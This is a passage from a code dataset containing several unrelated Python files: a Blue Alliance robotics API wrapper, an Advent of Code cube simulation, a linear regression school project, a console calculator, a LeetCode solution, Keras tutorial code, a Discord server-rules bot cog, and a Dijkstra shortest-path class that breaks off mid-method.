headers = self.header)\n json = response.json()\n match_list = []\n\n for match in json:\n match_obj = TBAMatch(match)\n match_list = match_list + [match_obj]\n\n return match_list\n\n def get_team_years_participated(self, team_key): #Get a list of years participated\n request = (self.baseURL + \"/team/\" + team_key + \"/years_participated\")\n response = requests.get(request, headers = self.header)\n years_participated = response.json()\n\n return years_participated\n\n def __pull_team_media(self, team_key, year): #pulls team media for use in get_team_media\n request = (self.baseURL + \"/team/\" + team_key + \"/\" + str(year) + \"/media\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n media_list = []\n\n for media in json:\n media_obj = TBAMedia(media)\n media_list = media_list + [media_obj]\n\n return media_list\n\n def get_team_media(self, team_key, year = None): #Get a list of all media objects a team is responsible for\n if not year is None:\n media_list = self.__pull_team_media(team_key, year)\n else:\n rookie_year = self.get_team(team_key).rookie_year\n current_year = datetime.datetime.now().year\n\n media_list = []\n\n for check_year in range(rookie_year, current_year):\n partial_list = self.__pull_team_media(team_key, check_year)\n media_list = media_list + partial_list\n\n return media_list\n\n def get_team_history_events(self, team_key): #Returns a list of all event objects a team has attended\n events_list = self.__pull_all_team_events(team_key)\n return events_list\n\n def get_team_history_awards(self, team_key): #Returns a list of all award objects a team has won\n request = (self.baseURL + \"/team/\" + team_key + \"/history/awards\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n award_list = []\n\n for award in json:\n award_obj = TBAAward(award)\n award_list = award_list + [award_obj]\n\n return award_list\n\n def get_team_history_robots(self, team_key): #Returns a list off all robot objects a team has made (seems to only work 2015 onwards)\n request = (self.baseURL + \"/team/\" + team_key + \"/history/robots\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n robo_container_obj = TBARobotGroup(json)\n\n return robo_container_obj\n\n def get_team_history_districts(self, team_key): #gets a list of districts a team has participated in by year\n request = (self.baseURL + \"/team/\" + team_key + \"/history/districts\")\n response = requests.get(request, headers = self.header)\n team_history_districts = response.json()\n\n return team_history_districts\n\n def calc_team_key(self, number): #Calculates a team's key given their team number\n key = \"frc\" + str(number)\n return key\n\n def get_event_list(self, year): #Returns a list of all event objects for a given year\n request = (self.baseURL + \"/events/\" + str(year))\n response = requests.get(request, headers = self.header)\n json = response.json()\n event_list = []\n\n for event in json:\n event_obj = TBAEvent(event)\n event_list = event_list + [event_obj]\n\n return event_list\n\n def get_event(self, event_key): #Returns a single event object given an event key\n request = (self.baseURL + \"/event/\" + event_key)\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n event_obj = TBAEvent(json)\n\n return event_obj\n\n def get_event_teams(self, event_key): #Returns a list of all team objects that attended an event\n request = (self.baseURL + \"/event/\" + event_key + 
\"/teams\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n team_list = []\n\n for team in json:\n team_obj = TBATeam(team)\n team_list = team_list + [team_obj]\n\n return team_list\n\n def get_event_matches(self, event_key): #Returns a list of all match objects in a given event\n request = (self.baseURL + \"/event/\" + event_key + \"/matches\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n match_list = []\n\n for match in json:\n match_obj = TBAMatch(match)\n match_list = match_list + [match_obj]\n\n return match_list\n\n def get_event_stats(self, event_key):\n request = (self.baseURL + \"/event/\" + event_key + \"/stats\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n event_stats = TBAEventStats(json)\n\n return event_stats\n\n def get_event_rankings(self, event_key):\n request = (self.baseURL + \"/event/\" + event_key + \"/rankings\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n event_rankings = TBAEventRankings(json)\n\n return event_rankings\n\n def get_event_awards(self, event_key): #Returns a list of all award objects given out at an event\n request = (self.baseURL + \"/event/\" + event_key + \"/awards\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n award_list = []\n\n for award in json:\n award_obj = TBAAward(award)\n award_list = award_list + [award_obj]\n\n return award_list\n\n def get_event_district_points(self, event_key): #returns a TBADistrictPoints obj, capable of method chaining\n request = (self.baseURL + \"/event/\" + event_key + \"/district_points\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n district_points_obj = TBADistrictPoints(json)\n\n return district_points_obj\n\n #Calculates event key from both year and event nickname.\n #Name variable does not have to be complete, but it must be properly capitalized and specific enough to specify a single event\n #Returns \"0\" is no events are found, \"1\" if more than one event is found, and event key otherwise.\n #ALL RETURNS ARE STRINGS\n #Based on method from https://github.com/Alexanders101/The-Blue-Alliance-Python-API/\n def calc_event_key(self, year, name):\n request = (self.baseURL + \"/events/\" + str(year))\n response = requests.get(request, headers = self.header)\n dictionary = response.json()\n events = np_array([[str(event['short_name']), str(event['key'])] for event in dictionary])\n ret = ''\n for sub in events[:, 0]:\n if sub[:len(name)].lower() == name.lower():\n if not ret == '':\n print(\"Multiple events found. Please refine your search.\")\n return '1'\n ret = sub\n curr = events[events[:, 0] == ret]\n if len(ret) == 0:\n print('No events found. Please ensure spelling and capitalization are correct.')\n return '0'\n return curr[0][1]\n\n def get_match(self, match_key): #Returns a single match object given the match key\n request = (self.baseURL + \"/match/\" + match_key)\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n match_obj = TBAMatch(json)\n\n return match_obj\n\n #Calculates match key from event key, competition level, match number, and, if needed, set number\n #Event key can be calculated using calc_event_key()\n #Comp level must be string: \"q\" for qualifying matches, \"ef\" for eighth final, \"qf\" for quarterfinal,\n # \"sf\" for semifinal or \"f\" for final\n #Match number is the standard match number. 
In elims, count restarts at 1 for every new set\n #Set number must be included for all requests except quals matches. This must even be included for finals, although it will always be 1\n def calc_match_key(self, event_key, comp_level, match_number, set_number = None):\n if not set_number == None:\n key = event_key + '_' + comp_level + str(set_number) + 'm' + str(match_number)\n else:\n key = event_key + '_' + comp_level + 'm' + str(match_number)\n return key\n\n def get_district_list(self, year):\n request = (self.baseURL + \"/districts/\" + str(year))\n response = requests.get(request, headers = self.header)\n district_list = response.json()\n\n return district_list\n\n def get_district_events(self, district_key, year): #Returns a list of event objects in a specific district\n request = (self.baseURL + \"/district/\" + district_key + \"/\" + str(year) + \"/events\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n event_list = []\n\n for event in json:\n event_obj = TBAEvent(event)\n event_list = event_list + [event_obj]\n\n return event_list\n\n def get_district_teams(self, district_key, year): #Returns a list of team objects in a specific district\n request = (self.baseURL + \"/district/\" + district_key + \"/\" + str(year) + \"/teams\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n team_list = []\n\n for team in json:\n team_obj = TBATeam(team)\n team_list = team_list + [team_obj]\n\n return team_list\n","sub_path":"TBApi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":23110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"603567595","text":"#!/usr/bin/env python3\n\nif __name__ == '__main__':\n with open('data.txt', 'r') as file:\n raw_data = file.read()\n\n rows = raw_data.split('\\n') # Make sure there's no newline at the end of data\n\n # cubes = {}\n cubes = set()\n\n for i, row in enumerate(rows):\n for j, tile in enumerate(row):\n # cubes[(j, i, 0)] = tile == '#' # True if #, False if .\n if tile == '#':\n cubes.add((j, i, 0))\n\n for _ in range(0, 6):\n # initial_cubes = set(cubes.keys())\n initial_cubes = cubes\n # print(f\"Initial cubes: {initial_cubes}\")\n evaluated_cubes = set()\n new_cubes = set()\n\n for cube in initial_cubes:\n x, y, z = cube\n for nx in range(x - 1, x + 2):\n for ny in range(y - 1, y + 2):\n for nz in range(z - 1, z + 2):\n evaluated_cubes.add((nx, ny, nz))\n\n for cube in evaluated_cubes:\n x, y, z = cube\n active_neighbors = 0\n for nx in range(x - 1, x + 2):\n for ny in range(y - 1, y + 2):\n for nz in range(z - 1, z + 2):\n if (nx, ny, nz) in initial_cubes and (nx, ny, nz) != cube:\n active_neighbors += 1\n if (cube in initial_cubes and 2 <= active_neighbors <= 3) or active_neighbors == 3:\n new_cubes.add(cube)\n cubes = new_cubes\n print(f\"Result: {len(cubes)}\")\n","sub_path":"day17-1.py","file_name":"day17-1.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"611389797","text":"# A level Computer Science Project 2019\r\n# Author: Matthew Byrne\r\n# Date: 7/10/19\r\n\r\n# Imports\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nx = [1,2,3,4,5,6,7,8,9,10,11,12]\r\nz = [13,14,15,16,17,18,19,20,21,22,23,24]\r\n\r\n# Equation Class, filled with useful procedures \r\nclass Equation:\r\n def __init__(self, contents): \r\n self.contents = contents\r\n self.equation = self.contents.replace(\" 
\",\"\").replace(\"y=\",\"\")\r\n \r\n if \" x\" in (\" \" + self.equation):\r\n self.equation = \"1\"+self.equation\r\n\r\n self.ac()\r\n self.x, self.y = self.evaluate()\r\n\r\n def ac(self):\r\n xPos = 0\r\n for i, I in enumerate(self.equation):\r\n if I.lower() == \"x\":\r\n xPos = i\r\n\r\n try:\r\n self.a = int(self.equation[:xPos]) if xPos > 0 else 1\r\n except ValueError:\r\n self.a = float(self.equation[:xPos]) if xPos > 0 else 1\r\n \r\n\r\n try:\r\n self.c = int(self.equation[xPos+2:])\r\n except ValueError:\r\n self.c = float(self.equation[xPos+2:])\r\n\r\n def __str__(self):\r\n return self.contents\r\n\r\n def __repr__(self):\r\n return self.contents\r\n\r\n def evaluate(self):\r\n x = []\r\n y = []\r\n\r\n for i in range(0,25):\r\n total = (self.a * i) + self.c\r\n x.append(i)\r\n y.append(total)\r\n\r\n return x,y\r\n\r\n def plot(self):\r\n plt.plot(self.x, self.y, color=\"black\")\r\n \r\n def predict(self, x):\r\n yPrediction = []\r\n\r\n for i in x:\r\n total = (self.a * i) + self.c\r\n yPrediction.append(total)\r\n\r\n return yPrediction\r\n\r\n# Global Subroutines\r\ndef findMean(data):\r\n total = 0\r\n tally = 0\r\n for i in data:\r\n total += i\r\n tally += 1\r\n\r\n mean = total / tally\r\n\r\n return mean\r\n\r\ndef sumVarTakeMean(data, mean): # Sum of variable - variable barred\r\n total = []\r\n\r\n for i in data:\r\n total.append(i - mean)\r\n\r\n return total\r\n\r\ndef sumVarTakeMeanSquared(data, mean): # Sum of (variable - variable barred) ** 2 \r\n total = 0\r\n\r\n for i in data:\r\n total += (i - mean) ** 2\r\n\r\n return total\r\n\r\ndef MultiplyArray(x, y):\r\n if type(x) is list and type(y) is list:\r\n total = 0\r\n for i, j in zip(x, y):\r\n total += i * j\r\n\r\n return total\r\n\r\n else:\r\n return x * y\r\n\r\ndef plot(x, y):\r\n plt.plot(x, y, color=\"red\", dashes=[5, 5])\r\n\r\ndef FormEquation(x,y):\r\n xBar = findMean(x) # Mean of x\r\n sumXtakeXbar = sumVarTakeMean(x, xBar) # Sigma x - x barred\r\n sumXtakeXbarSquared = sumVarTakeMeanSquared(x, xBar) # Sigma (x - x barred) ** 2\r\n\r\n\r\n yBar = findMean(y) # Mean of y\r\n sumYtakeYbar = sumVarTakeMean(y, yBar) # Sigma y - y barred\r\n\r\n sigVarsTakeMean = MultiplyArray(sumXtakeXbar, sumYtakeYbar)\r\n\r\n m = sigVarsTakeMean / sumXtakeXbarSquared\r\n c = yBar - (m * xBar)\r\n\r\n\r\n return m, c, xBar, yBar\r\n\r\ndef Rsquare(y, yBar, yPred):\r\n predMinBar = []\r\n actMinBar = []\r\n\r\n for i, j in zip(yPred, y):\r\n totalPred = (i - yBar) ** 2\r\n totalAct = (j - yBar) ** 2\r\n predMinBar.append(totalPred)\r\n actMinBar.append(totalAct)\r\n\r\n sumPred = sum(predMinBar)\r\n sumAct = sum(actMinBar)\r\n\r\n rSquare = sumPred / sumAct\r\n\r\n return rSquare\r\n\r\ndef optimise(x, y, line_equ, yBar, m, c, r2):\r\n optimisedUp = False\r\n optimisedDown = False\r\n\r\n optimalUp = line_equ.contents\r\n optimalDown = line_equ.contents\r\n\r\n oldR2Up = r2\r\n oldR2Down = r2\r\n\r\n i = 0.1\r\n j = 0.1\r\n\r\n\r\n # Incrementing m and comparing the r^2 \r\n while not optimisedUp and i < 5:\r\n new_equation = Equation(f\"y = {m+i}x + {c}\")\r\n newPredictions = new_equation.predict(x)\r\n newR2Up = Rsquare(y, yBar, newPredictions)\r\n\r\n if (1 - newR2Up) < (1 -oldR2Up) and (1 - newR2Up) >= 0:\r\n optimalUp = new_equation.contents\r\n oldR2Up = newR2Up\r\n i += 0.1\r\n\r\n else:\r\n optimisedUp = True\r\n\r\n # Decrementing m and comparing the r^2 \r\n while not optimisedDown and j < 5:\r\n new_equation = Equation(f\"y = {m-j}x + {c}\")\r\n newPredictions = new_equation.predict(x)\r\n 
newR2Down = Rsquare(y, yBar, newPredictions)\r\n\r\n if (1 - newR2Down) < (1 - oldR2Down) and (1 - newR2Down) >= 0:\r\n optimalDown = new_equation.contents\r\n oldR2Down = newR2Down\r\n j += 0.1\r\n\r\n else:\r\n optimisedDown = True\r\n\r\n\r\n # Comparing the Incremented r^2 to the decremented r^2 to see which is closer to 1\r\n if (1 - newR2Down) < (1 - newR2Up):\r\n return Equation(optimalDown)\r\n\r\n elif (1 - newR2Down) > (1 - newR2Up):\r\n return Equation(optimalUp)\r\n\r\n else:\r\n return line_equ\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # Results\r\n \r\n y = [3,4,2,4,5,6,6,9,11,12,14,16]\r\n\r\n m, c, xBar, yBar = FormEquation(x, y)\r\n line_equ = Equation(f\"y = {m}x + {c}\")\r\n yPred = line_equ.predict(x)\r\n r2 = Rsquare(y, yBar, yPred)\r\n\r\n optimised_equation = optimise(x, y, line_equ, yBar, m, c, r2)\r\n\r\n predictions = optimised_equation.predict(x)\r\n r2 = Rsquare(y, yBar, predictions)\r\n\r\n plot(x, y)\r\n print(f\"This line models the data with a {r2 * 100}% accuracy\")\r\n plt.title(f\"Sales Prediction Using Linear Regression\\nAccuracy of approximately {round(r2 * 100)}%\")\r\n optimised_equation.plot()\r\n plt.legend([optimised_equation], loc=2)\r\n plt.ylabel(\"Sales (£1000)\")\r\n plt.xlabel(\"Time (Months)\")\r\n\r\n plt.savefig(\"output.png\")\r\n\r\n results = optimised_equation.y[12:]\r\n for i, I in enumerate(results):\r\n results[i] = round(I)\r\n\r\n plt.show()\r\n","sub_path":"linear_regression_MB.py","file_name":"linear_regression_MB.py","file_ext":"py","file_size_in_byte":5698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"574693284","text":"import argparse\nimport sys\n\n\nparser = argparse.ArgumentParser(description='Console calculator')\nparser.add_argument('-a', '--action', metavar='ACTION', type=str, action='store', help='performs an operation')\nparser.add_argument('-v', '--verbose', action='store_true', help ='verbose the statement')\nparser.add_argument('values', metavar=\"VALUES\", type=float, nargs=\"+\", help='input data')\n\nargs = parser.parse_args()\n\nif len(args.values) != 2:\n print('Input must contain 2 numbers')\n file = sys.stderr\n sys.exit(-1)\n\nif args.action:\n a, b = args.values[0], args.values[1]\n if args.action == '+':\n res = a+b\n elif args.action == '-':\n res = a-b\n elif args.action == '*':\n res = a*b\n elif args.action == '/':\n res = a/b\n else:\n print('incorrect operator')\n print(res)\n\nif args.verbose:\n print(a,' ',args.action,' ',b,' = ', res)","sub_path":"lab16/16-ex2.py","file_name":"16-ex2.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476089096","text":"#方法一:自己方法\r\nclass Solution:\r\n def hasGroupsSizeX(self, deck: [int]) -> bool:\r\n import collections\r\n ret={}\r\n n=len(deck)\r\n if n<2:\r\n return False\r\n for i in range(n):\r\n ret[deck[i]]=ret.get(deck[i],0)+1\r\n #上面统计个数何以用 ret=collections.Counter(deck)\r\n\r\n a=min(ret.values())\r\n def gcd(x,y):\r\n small=min(x,y)\r\n while small:\r\n if x%small==0 and y%small ==0:\r\n return small\r\n else:\r\n small-=1\r\n #上面求最大公约数的函数可以用math.gcd()\r\n for j in ret.values():\r\n a=gcd(j,a)\r\n return a>1\r\na=Solution()\r\nprint(a.hasGroupsSizeX(deck=[1,1,2,2,2,2]))\r\n\r\n#官方方法:\r\nclass Solution:\r\n def hasGroupsSizeX(self, deck: [int]) -> bool:\r\n import math\r\n from functools import reduce #functools.reduce逐次对上次函数结果与当前序列元素应用函数\r\n import collections\r\n ret = 
collections.Counter(deck).values()\r\n return reduce(math.gcd,ret)>=2\r\n\r\n","sub_path":"序号题/914.py","file_name":"914.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"395772013","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport tensorflow as tf\nfrom tensorflow import keras\n\n\n# In[4]:\n\n\ntf.keras.version()\n\n\n# In[5]:\n\n\n#keras uses layers to build models, models are a graph of layers\n\n\n# In[8]:\n\n\nfrom tensorflow.keras import layers\n\n#type of model: Sequential\nmodel = tf.keras.Sequential()\n#creates a \"dense\" layer with 64 units \nmodel.add(layers.Dense(64,activation = 'relu'))\n\nmodel.add(layers.Dense(64, activation = 'relu'))\n#output layer has 10 units\nmodel.add(layers.Dense(10))\n\n\n# In[9]:\n\n\n#activation: sets activation function, default none\n#kernel_initializer/bias_initializer: creates layer's weights (kernels and biases)\n #name or callable, default \"Glorot uniform\"\n#kernel_regularizer/bias_regularizer: creates schemes that apply weights\n #ex L1 or L2, default none\n\n\n# In[10]:\n\n\n#CREATES LAYERS\n\n#creates relu layer\nlayers.Dense(64, activation = 'relu')\n#alternatively:\nlayers.Dense(64, activation = tf.nn.relu)\n#l1: lasso regression\n#l2: ridge regression\n\n#l1 regularization of factor .01 applied to kernel matrix\nlayers.Dense(64, kernel_regularizer=tf.keras.regularizers.l1(0.01))\n\nlayers.Dense(64, kernel_regularizer=tf.keras.regularizers.l2(.01))\n\n#linear layer that makes random orthonoganal matrix\nlayers.Dense(65, kernel_initializer=\"orthogonal\")\n\n#linear layer with bias vector initialized to 2.0\nlayers.Dense(64,bias_initializer=tf.keras.initializers.Constant(2.0))\n\n\n# In[11]:\n\n\n#SET UP TRAINING\n\nmodel=tf.keras.Sequential([\n #add in blank layers\n layers.Dense(64,activation='relu',input_shape=(32,)),\n layers.Dense(64,activation='relu'),\n layers.Dense(10)])\n#optimizer: specifies training procedure, ex Adam or SGD\n#loss: function to minimize during optimization\n#metrics: monitors training\nmodel.compile(optimizer=tf.keras.optimizers.Adam(0.01),\n loss=tf.keras.losses.CategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\n\n# In[13]:\n\n\n#CREATE TRAINING MODEL\n#this example uses mean-squared error regression\n\nmodel.compile(optimizer=tf.keras.optimizers.Adam(0.01),\n loss='mse',#mean squared error\n metrics=['mae'])#mean absolute error\n\nmodel.compile(optimizer=tf.keras.optimizers.RMSprop(.01),\n loss=tf.keras.losses.CategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\n\n# In[14]:\n\n\n#TRAIN\n\nimport numpy as np\n\ndata = np.random.random((1000,32))\nlabels = np.random.random((1000,10))\n\nmodel.fit(data,labels, epochs=10, batch_size=32)\n#epochs: an iteration over the entire set of input data\n#batch_size: integer size of each batch that will be iterated over\n #last batch may be smaller\n#validation_data: displays loss and metrics for data after each epoch\n\n\n# In[15]:\n\n\n#TRAINING WITH VALIDATION\n\nimport numpy as np\n\ndata = np.random.random((1000,32))\nlabels = np.random.random((1000,10))\n\nval_data = np.random.random((100,32))\nval_labels = np.random.random((100,10))\n\nmodel.fit(data, labels, epochs=10, batch_size=32,\n validation_data=(val_data,val_labels))\n\n\n# In[16]:\n\n\n#TRAIN FROM DATA SETS\n\ndataset = tf.data.Dataset.from_tensor_slices((data, labels))\ndataset = dataset.batch(32)\n\nmodel.fit(dataset, epochs=10)\n\n\n# 
In[18]:\n\n\n#validation with datasets\n\ndataset = tf.data.Dataset.from_tensor_slices((data, labels))\ndataset = dataset.batch(32)\n\nval_dataset = tf.data.Dataset.from_tensor_slices((val_data, val_labels))\nval_dataset = val_dataset.batch(32)\n\nmodel.fit(dataset, epochs=10,\n validation_data=val_dataset)\n\n\n# In[19]:\n\n\n#EVALUATE\n\ndata = np.random.random((1000, 32))\nlabels = np.random.random((1000, 10))\n\nmodel.evaluate(data, labels, batch_size = 32)\n\ndataset = tf.data.Dataset.from_tensor_slices((data, labels))\ndataset = dataset.batch(32)\n\nmodel.evaluate(dataset)\n\n\n# In[20]:\n\n\n#PREDICT OUTPUT\nresult = model.predict(data, batch_size = 32)\nprint(result.shape)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"RoyWIP/Keras.py","file_name":"Keras.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"357711512","text":"from abc import ABC, abstractmethod\n\nclass Clothes(ABC):\n @abstractmethod\n def consumption(self):\n pass\n\nclass Coat(Clothes):\n def __init__(self, v):\n self.v = v\n\n @property\n def consumption(self):\n return self.v / 6.5 + 0.5\n\nclass Suit(Clothes):\n def __init__(self, h):\n self.h = h\n\n @property\n def consumption(self):\n return 2 * self.h + 0.3\n\n def sum_consumption(self, list_suits):\n a = 0\n for suit in list_suits:\n a += suit.consumption\n return a\n\ncoat = Coat(50)\ncostume = Suit(1.96)\ncostume_2 = Suit(1.24)\ncostume_3 = Suit(1.76)\ncostume_4 = Suit(2.10)\nlist_costumes = [costume_4, costume_3, costume_2, costume]\nprint(coat.consumption)\nprint(costume_2.consumption)\nprint(costume.sum_consumption(list_costumes))\n\n","sub_path":"lesson_7_task_2.py","file_name":"lesson_7_task_2.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"246330437","text":"import discord\nfrom discord.ext import commands\nfrom discord.ext.commands.cooldowns import BucketType\n\n\nclass crules(object):\n rules = [\n \"Follow the Discord Terms of Service and the Community Guidelines\",\n \"Don't be an asshole\",\n \"No discord invite links\",\n \"NSFW content is not allowed to any degree\",\n \"Keep it english in every chat\",\n \"No Political, religious, racial or highly depressive discussions\",\n \"Keep content in their respective channels\",\n \"No Promotion outside of #🔰│promotion\",\n \"Do not share personal information about others without their consent\",\n \"Staff will always have the last word\",\n \"Do not minimod\",\n \"Keep chat clean\"\n ]\n\n ruleinfo = [\n \"You can find the TOS here and the Community Guidelines at https://discord.com/terms.\",\n \"This includes things spamming, spoiling and being disrespectful.\",\n \"This includes sending invite links to server members without it being previously discussed.\",\n \"This also means any memes that are NSFW are not allowed.\",\n \"You are only allowed to speak a different language in #🤠│spam-east.\",\n \"If you feel like anyone is overstepping this rule, ping a staff member.\",\n \"Read channel descriptions and names.\",\n \"This includes telling people to check out #🔰│promotion.\",\n \"Respect each others privacy.\",\n \"If you feel like you’ve been treated unfairly, contact a staff member of higher power.\",\n \"This means if someone is breaking the rules, do not personally tell them not to, instead DM or ping staff about it and let the staff handle it.\",\n \"This mean no full caps, no copypastas or tYpInG LiKE 
tHIs.\"\n ]\n\n\nclass rules(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n # variables\n right = '✅'\n wrong = '❌'\n\n def hembed(self, st: bool):\n if st:\n embed = discord.Embed(\n color=discord.Color.blue()\n )\n else:\n embed = discord.Embed(\n color=discord.Color.red()\n )\n return embed\n\n @commands.command(name=\"rule\")\n @commands.guild_only()\n @commands.has_permissions(manage_messages=True)\n @commands.cooldown(rate=1, per=3, type=BucketType.default)\n async def _rule(self, ctx, n: int=None):\n '''Displays the nth rule, if exits'''\n await ctx.message.delete()\n\n await ctx.trigger_typing()\n if n is not None:\n try:\n # deciding values\n rulenumber = 'Rule {0}'.format(n)\n rule = crules.rules[n - 1]\n ruleinfo = crules.ruleinfo[n - 1]\n\n # sending information\n embed = self.hembed(True)\n embed.set_author(name=rulenumber)\n\n # fields\n embed.add_field(name=rule, value=ruleinfo, inline=False)\n\n # indication\n emoji = self.right\n except:\n embed = self.hembed(False)\n\n # fields\n embed.add_field(name=\"syntax error\", value=\"Rule doesn't exist\", inline=False)\n\n # indication\n emoji = self.wrong\n else:\n # sending information\n embed = self.hembed(False)\n embed.set_author(name=\"Server Rules Command\")\n\n # fields\n embed.add_field(name=\"How to use it?\", value=\"Add the Number of rule you want to see/show as an argument \\n > []rule [number]\", inline=False)\n\n # indication\n emoji = self.right\n sent = await ctx.send(embed=embed)\n\n # indication\n await sent.add_reaction(emoji)\n\n @commands.command(name=\"rules\")\n @commands.has_permissions(manage_messages=True)\n @commands.cooldown(rate=1, per=3, type=BucketType.default)\n async def _rules(self, ctx):\n '''Displays all rules in one command'''\n await ctx.message.delete()\n\n ctx.trigger_typing()\n embed = self.hembed(True)\n embed.set_author(name='Server Rules!')\n if len(crules.rules) != 0:\n # indication\n emoji = self.right\n\n # fields\n for i in range(len(crules.rules)):\n # deciding values in each loop\n rulenumber = 'Rule {0}'.format(i+1)\n description = (\"**{0}**\\n{1}\".format(crules.rules[i], crules.ruleinfo[i]))\n\n # adding field\n embed.add_field(name=rulenumber, value=description, inline=False)\n else:\n # indication\n emoji = self.wrong\n\n # fields\n embed.add_field(name=\"No Server Rules\", value=\"This server currently has no rules set\", inline=False)\n embed.set_footer(text='use []rule [number] to view each rules*')\n\n # indication\n sent = await ctx.send(embed=embed)\n await sent.add_reaction(emoji)\n\n# =========================================================================================== #\ndef setup(bot):\n bot.add_cog(rules(bot))","sub_path":"cogs/rules.py","file_name":"rules.py","file_ext":"py","file_size_in_byte":5114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"579340868","text":"from GRAPH import GRAPH\nimport math\nclass Dijkstra(GRAPH): \n def Dijkstra(self, startPoint, endPoint):\n #creation d'un dictionnaire avec chemin le plus court\n dictDistance = {}\n for x in self.dictAdj:\n if x == startPoint:\n dictDistance[x] = (0, [x])\n else:\n dictDistance[x] = (math.inf,[])\n #variables nécessaire pour la première itération de la boucle pour\n closestPoint = startPoint\n distanceBetween = 0\n untreatedPoints = []\n treatedPoints = []\n for i in range(len(self.listPoint)):\n untreatedPoints.append(self.listPoint[i])\n #tant que le point le plus proche non traité n'est pas le point final\n while 
closestPoint != endPoint:\n #retirer le point traité\n untreatedPoints.remove(closestPoint)\n treatedPoints.append(closestPoint)\n #obtenir la liste des voisins\n neighborPoints = self.visiterSommet(closestPoint)\n #mettre a jour les voisins\n for i in range(len(neighborPoints)):\n #obtenir la distance entre les voisins et le point le plus proche\n for j in range(len(self.dictAdj[closestPoint])):\n if self.dictAdj[closestPoint][j][0] == neighborPoints[i]:\n distanceBetween = self.dictAdj[closestPoint][j][1]\n #mettre a jour la distance et le chemin si il est favorable\n if dictDistance[neighborPoints[i]][0] > dictDistance[closestPoint][0] + distanceBetween:\n dictDistance[neighborPoints[i]] = (dictDistance[closestPoint][0] + distanceBetween, dictDistance[closestPoint][1] + [neighborPoints[i]])\n #trouver le nouveau point le plus proche\n minimum = dictDistance[untreatedPoints[0]]\n minimumPoint = untreatedPoints[0]\n for i in range(len(untreatedPoints)):\n if dictDistance[untreatedPoints[i]] < minimum and dictDistance[untreatedPoints[i]] != -1:\n minimum = dictDistance[untreatedPoints[i]]\n minimumPoint = untreatedPoints[i]\n closestPoint = minimumPoint\n #rendre la distance la plus court entre le point de départ et le point d'arrivée en plus du chemin\n treatedPoints.append(closestPoint)\n self.printDistances(dictDistance, endPoint, treatedPoints)\n \n def printDistances(self, dictDistance, endPoint, treatedPoints):\n print(\"Voici la distance pour aller au point d'arrivé \", endPoint, \": \", dictDistance[endPoint][0], end = '. ')\n print(\"Le chemin est: \", dictDistance[endPoint][1][0], end = '')\n for i in range(len(dictDistance[endPoint][1]) - 1):\n print(\" -->\", dictDistance[endPoint][1][i+1], end = '')\n print('')\n print(\"Voici les points pour lesquelles un chemin optimale a été trouvé\")\n for x in treatedPoints:\n print(x, ' est à une distance minimum de ', dictDistance[x][0], ' en passant par: ', dictDistance[x][1][0], end = '')\n for i in range(len(dictDistance[x][1]) - 1):\n print (' --> ', dictDistance[x][1][i+1], end = '')\n print('')\n infinits = 0\n for x in dictDistance:\n if dictDistance[x][0] == math.inf:\n infinits += 1\n if len(treatedPoints) + infinits != len(dictDistance):\n print(\"Voici les points pour lesquelles un chemin a été trouvé, mais qui n'est peut-être pas optimal\")\n distancesOver = []\n for x in dictDistance:\n if (not (x in treatedPoints)) and (x != endPoint):\n if dictDistance[x][0] != math.inf:\n distancesOver.append(dictDistance[x][0])\n distancesOver.sort()\n for i in range(len(distancesOver)):\n for x in dictDistance:\n if dictDistance[x][0] == distancesOver[i]:\n print(x, ' est à une distance minimum de ', dictDistance[x][0], ' en passant par: ', dictDistance[x][1][0], end = '')\n for j in range(len(dictDistance[x][1]) - 1):\n print (' --> ', dictDistance[x][1][j+1], end = '')\n print('')\n if infinits != 0:\n print(\"Voici les points pour lesquelles on a eu la flemme de trouver un chemin, (c'est trop loin, j'y vais pas)\")\n for x in dictDistance:\n if dictDistance[x][0] == math.inf:\n print(x)\n \n def DijkstraPseudo(self, startPoint, endPoint):\n dictDistance = self.createDictShortPath(startPoint) #creation d'un dictionnaire avec chemin le plus court\n (closestPoint, distanceBetween, untreatedPoints) = self.initiateFirstWhile(startPoint) #variables nécessaire pour la première itération de la boucle pour\n while closestPoint != endPoint: #tant que le point le plus proche non traité n'est pas le point final\n 
